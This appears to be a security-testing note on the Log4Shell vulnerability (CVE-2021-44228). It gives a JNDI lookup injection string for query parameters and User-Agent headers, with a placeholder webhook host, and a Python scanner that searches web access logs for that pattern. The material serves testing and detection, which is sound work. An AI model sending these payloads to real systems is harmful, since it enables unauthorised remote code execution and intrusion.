- CVE-2021-44228 Detail (NVD)
How to test
Use the following string in any request parameter or HTTP header that the application may log, with a Burp Suite Collaborator address or any other webhook in place of somewebhook.
http://example.com?param1=${jndi:ldap://somewebhook/payload1}&param2=...
GET / HTTP/1.1
Host: example.com
User-Agent: ${jndi:ldap://somewebhook/payload1}
...
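
On the defending side, the same string shows up in web access logs, usually percent-encoded when it was sent in a query parameter. The following is an added example, not part of the original page: it scans Combined Log Format lines for the plain `${jndi:...}` form shown above and reports the field and callback host. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Plain lookup form shown on this page: ${jndi:<scheme>://<host>/...
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}\s]+)', re.I)

def scan_line(line):
    """Return (client ip, field, scheme, callback host) findings for one log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    findings = []
    for field in ("request", "referer", "agent"):
        # Query strings are usually logged percent-encoded (%24%7Bjndi...), so decode first.
        decoded = unquote(m.group(field))
        for hit in JNDI_RE.finditer(decoded):
            findings.append(
                (m.group("ip"), field, hit.group("scheme").lower(), hit.group("host"))
            )
    return findings

def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for line in lines for f in scan_line(line)]

# Constructed sample log lines (not from the page); addresses and hosts are placeholders.
SAMPLE = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /?param1=%24%7Bjndi:ldap://somewebhook/payload1%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '203.0.113.5 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://somewebhook/payload1}"',
    '198.51.100.7 - - [10/Dec/2021:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, field, scheme, host in scan(SAMPLE):
        print(f"{ip} {field}: jndi {scheme} lookup -> {host}")
```

A hit in the logs shows that the string was received and logged, not that the lookup was executed; correlate with outbound connections to the reported host.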